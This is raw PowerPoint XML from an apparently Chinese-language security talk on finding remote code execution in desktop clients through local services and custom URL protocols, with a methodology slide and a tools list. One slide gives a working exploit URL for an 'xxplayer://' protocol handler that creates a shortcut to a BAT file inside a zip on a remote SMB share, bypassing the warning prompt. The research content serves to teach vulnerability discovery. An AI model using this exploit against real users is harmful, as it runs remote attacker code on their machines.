                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>最终发现，可以通过压缩包内嵌</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>BAT</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>文件的形式无条件绕过弹窗提示，我们需要讲</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
                <a:t>url</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>参数设为</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
                <a:t>\\172.16.176.225\share\1.zip\1.bat</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>无需解压即可打开</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>BAT</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>，最终双击新建的快捷方式成功实现</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>RCE</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
                <a:t>Exploit</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
                <a:t>：</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
                <a:t>xxplayer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
                <a:t>://</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
                <a:t>action.cmd</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
                <a:t>createshortcut_url?url</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
                <a:t>=\\172.16.176.225\share\1.zip\1.bat&amp;name=123</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3295234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
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D855D6F-1D5B-FC98-7C74-97B32B72EA3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3666565" y="2951946"/>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附录总结</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="组 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82E7C504-8E71-FA8E-98D3-EBBC41A10B86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5681330" y="3661198"/>
            <a:ext cx="1089088" cy="45719"/>
            <a:chOff x="3232298" y="1892595"/>
            <a:chExt cx="1089088" cy="53163"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC8A9269-94BA-91F8-393E-C2871DAF2849}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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F637DE2B-1A41-C5C4-30D0-813DE03EA2C1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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831835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66565"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思路总结</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="组 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5551456"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
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6F8D262-7063-5CD3-22E5-0A65FF9AB6E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="656493" y="2149890"/>
            <a:ext cx="10879015" cy="2554545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> 找到客户端启动的本地起网络服务（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="e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a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="e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这个可以用火绒剑或者</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>CMD</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的方式查看；</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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> 有本地监听的情况下，找到对应的程序以及加载的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>DLL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="e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通过</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>IDA</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>根据端口号找到监听的点，如果是</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>C/C++</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的程序一般找</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>bind</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>这个函数就能快速定位到；</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> 向上回溯找调用链，并根据网络服务的返回结果，例如</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>访问会有一段字符串或者响应头的一些字符串，定位到代码处理逻辑；</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> 如果逻辑对应上了，那就接着找程序的导入表是否存在敏感的函数，例如：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>CreateProcess</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="e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WinExec</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en"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ShellExec</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="e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如果存在则可以向上回溯看看是否与网络服务监听点有联系；</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>5. </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> 当条件都满足的时候就想尽办法，通过断点调试等操作，找传参或数据传输格式，看看可控内容是否可达敏感的函数处；</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>6. </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> 根据代码逻辑构造</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>PoC</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>触发漏洞，并尝试武器化利用。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="944962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66565"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常用工具</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="组 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5551456"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合 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3550D47A-780F-AF6D-CC14-9D9C0A1FB688}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="221882" y="1757652"/>
            <a:ext cx="11748236" cy="4347574"/>
            <a:chOff x="252862" y="1757652"/>
            <a:chExt cx="11748236" cy="4347574"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="文本框 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67C9DFAF-A92F-29DA-AFA9-0010762CF01E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="252862" y="1757652"/>
              <a:ext cx="8296836" cy="1569660"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>逆向调试：</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>IDA</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a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>x32/64dbg</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ghidra</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en" altLang="zh-CN"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zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>辅助分析：</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>CFF Explorer </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URLProtocolView</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err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>BurpSuite</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a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>IFFA</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>…</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>模糊测试：</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>Peach</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
